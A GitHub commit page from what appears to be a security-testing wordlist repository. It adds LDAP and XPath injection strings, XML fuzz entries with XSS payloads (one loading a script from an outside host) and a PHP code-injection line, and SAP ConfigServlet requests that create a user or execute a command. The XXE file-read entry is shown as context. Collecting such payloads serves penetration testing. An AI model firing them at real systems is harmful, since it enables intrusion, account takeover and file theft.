Skip to content

Commit

Permalink
Merge pull request danielmiessler#9 from shipcod3/master
Browse files Browse the repository at this point in the history
Update XML_FUZZ
  • Loading branch information
jhaddix committed Jan 12, 2015
2 parents 3f9bfc6 + d1bdc1d commit edb75b5
Showing 3 changed files with 43 additions and 0 deletions.
26 changes: 26 additions & 0 deletions Fuzzing/LDAP_FUZZ.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,26 @@
!
%21
%26
%28
%29
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
%7C
&
(
)
*(|(mail=*))
*(|(objectclass=*))
*/*
*|
/
//
//*
@*
x' or name()='username' or 'x'='y
|
*()|&'
admin*
admin*)((|userpassword=*)
*)(uid=*))(|(uid=*
15 changes: 15 additions & 0 deletions Fuzzing/XML_FUZZ
Original file line number Diff line number Diff line change
@@ -11,6 +11,11 @@
]>
<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///etc/passwd">
]>
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
<name>','')); phpinfo(); exit;/*</name>


## Element and Attrib Values
@@ -48,3 +53,13 @@ false
{{Tnn96}}
{= Tnn96}
{{= Tnn96}}
' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
@*
count(/child::node())
x' or name()='username' or 'x'='y
2 changes: 2 additions & 0 deletions vulns/sap.txt
Original file line number Diff line number Diff line change
@@ -92,6 +92,8 @@ caf
ccsui
com~tc~lm~webadmin~httpprovider~web
ctc
ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=blabla,PASSWORD=blabla
ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig%20/all
dispatcher
dswsbobje
dtr_lite

0 comments on commit edb75b5

Please sign in to comment.